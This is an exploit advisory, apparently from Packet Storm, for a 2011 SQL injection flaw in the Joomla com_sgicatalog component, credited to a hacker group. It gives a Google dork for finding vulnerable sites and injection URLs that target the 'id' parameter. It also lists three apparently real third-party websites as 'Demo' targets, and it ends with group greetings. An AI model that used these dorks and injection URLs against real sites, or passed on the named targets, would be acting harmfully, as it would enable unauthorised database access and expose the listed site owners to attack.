The Joomla Sgicatalog component version 1.x suffers from a remote SQL injection vulnerability.
7e6fab15f2a268c1137938fb9309a5f170d0acc7762964dcde58038e767631da
####
# Exploit Title: Joomla Component (com_sgicatalog) <= SQL Injection Vulnerability
# Google Dork: inurl:index.php?option=com_sgicatalog
# Date: 2011-10-12
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: http://joomlaapps.com/
# Version: 1.x
# Tested on: [Windows XP- Persian]
# CVE : Webapps
####
[*] ExpLo!T :
http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'
http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]
http://127.0.0.1/path/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi]
[*] Demo : http://umbertodei.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'
[*] Demo : http://www.holmac.com/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'
[*] Demo : http://www.anisap.veneto.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416'
####
[+] Peace From #BHG
Vunl Component : com_sgicatalog
Error in file joomla Component (com_sgicatalog) Sql Injection
A vulnerable parameter $ en&id=
####
=================================**BHG Security Center**=====================================|
# Greets To : |
|
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili |
cmaxx ~ G3n3Rall ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y |
s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ |
============================================================================================ |
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed